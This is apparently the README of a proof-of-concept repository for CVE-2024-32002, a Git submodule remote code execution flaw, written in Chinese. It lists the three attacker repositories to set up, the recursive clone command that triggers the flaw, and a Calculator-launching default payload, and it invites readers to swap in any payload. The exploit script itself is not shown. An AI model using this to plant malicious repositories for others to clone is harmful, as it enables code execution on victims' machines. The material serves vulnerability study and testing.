
CVE-2024-32002 RCE PoC
此仓库包含 CVE-2024-32002 的概念验证(PoC),这是 Git 子模块中的一个远程代码执行(RCE)漏洞。该漏洞演示了如何通过递归克隆 Git 仓库来触发恶意负载。
在运行 PoC 之前,请在您的远程 Git 服务器上创建以下仓库,或根据需要更改名称:
hulk.gitsubmod.gitsmash.git如果更改了名称,请相应更新 PoC 脚本中的仓库路径。
该漏洞利用 Git 子模块,在递归克隆仓库时,于目标系统上执行负载。此 PoC 已在 macOS 上测试。
HULK_REPO="[email protected]:safebuffer/hulk.git"
pullme_REPO="[email protected]:safebuffer/submod.git"
# 最终漏洞仓库
SMASH_REPO="[email protected]:safebuffer/smash.git"
要触发漏洞,请运行 poc.sh 脚本,然后执行以下命令:
git clone --recursive $SMASH_REPO
此 PoC 中的默认负载会在 macOS 上打开计算器应用程序。您可以根据需要将其更改为任何负载。
/System/Applications/Calculator.app/Contents/MacOS/Calculator
此 PoC 仅用于教育目的。请负责任地使用它,并且仅在您拥有明确测试权限的系统上使用。滥用此 PoC 可能会导致严重后果。